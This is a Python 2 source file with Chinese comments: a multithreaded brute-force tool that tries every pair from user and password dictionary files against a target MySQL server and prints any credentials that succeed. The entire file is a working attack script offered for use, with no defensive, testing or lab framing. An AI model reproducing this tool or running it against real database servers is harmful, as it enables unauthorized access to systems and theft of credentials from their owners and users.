- #!coding=utf-8
- import re
- import socket
- import optparse
- import threading
- import time
- try:
- import pymysql
- except ImportError:
- print "[!!!]需要先安装pymysql模块"
- print "[!!!]Usage:pip install pymysql"
- exit()
- result_user =None
- result_pass =None
- threads =[]
- #----------------------------------------------------------------------
- def main():
- """
- 主函数,处理输入的参数
- """
- parse = optparse.OptionParser('python %prog -H <target host> --u <users dictionary> --p <password dictionary> -P <port>')
- parse.add_option('-H', dest="target_host", type="string", help='目标主机')
- parse.add_option('--u', dest='user_dic', type='string', help='用户字典')
- parse.add_option('--p', dest='pwd_dic', type='string', help='密码字典')
- parse.add_option('-P', dest='port', type='int', help='端口')
- (options, args) = parse.parse_args()
- target_host = options.target_host
- user_dic = options.user_dic
- pwd_dic = options.pwd_dic
- port = options.port
- if target_host is not None:
- mysql_brute(target_host, user_dic, pwd_dic, port)
- else:
- print "[!!!]Unknon IP"
- exit()
- #----------------------------------------------------------------------
- def mysql_brute(host,user_dic,pwd_dic,port):
- """
- MySQL暴力破解
- :param host: 主机
- :param user_dic: 用户字典
- :param pwd_dic: 密码字典
- :param port: 端口
- :return: None
- """
- global start_time
- start_time =time.time()
- print "[*] Target:" + host
- print "[*] Start cracking"
- userlist = None
- pwdlist = None
- try:
- socket.gethostbyname(host)
- except Exception:
- print '[*] Cannot connect to %s' % host
- exit()
- try:
- userlist = [i.strip('\n') for i in open(user_dic, 'r').readlines()]
- pwdlist = [j.strip('\n') for j in open(pwd_dic, 'r').readlines()]
- print "[*] Number of users:" + str(len(userlist))
- print "[*] Number of passwords:" + str(len(pwdlist))
- except Exception:
- print "[!] The path of the dictionary file is incorrect"
- exit()
- global threads
- for user in userlist:
- for pwd in pwdlist:
- if result_user is None and result_pass is None:
- t = threading.Thread(target=mysql_login, args=(host, user, pwd, port))
- t.start()
- threads.append(t)
- #----------------------------------------------------------------------
- def mysql_login(host, username, password, port):
- """
- MySQL连接
- :param host:主机
- :param username:用户名
- :param password: 密码
- :param port: 端口
- :return: None
- """
- try:
- db = pymysql.Connect(host=host, port=port, user=username, passwd=password)
- print "\033[1;32;41m[+] Success! User:" + username + " Password:" + password + "\033[0m"
- global result_user, result_pass
- global end_time
- end_time = time.time()
- result_user = username
- result_pass = password
- db.close()
- exit()
- except Exception:
- #print "[-] Fail! User:" + username + " Password:" + password
- pass
- #----------------------------------------------------------------------
- if __name__ == '__main__':
- main()
- for thread in threads:
- thread.join()
- if result_user is not None and result_pass is not None:
- print "用时:%s秒" %(end_time-start_time)
- print "\033[1;32;41m[+] Result: %s - %s\033[0m" % (result_user, result_pass)
- exit()
- if result_user is None and result_pass is None:
- print "[+] Crack Fail"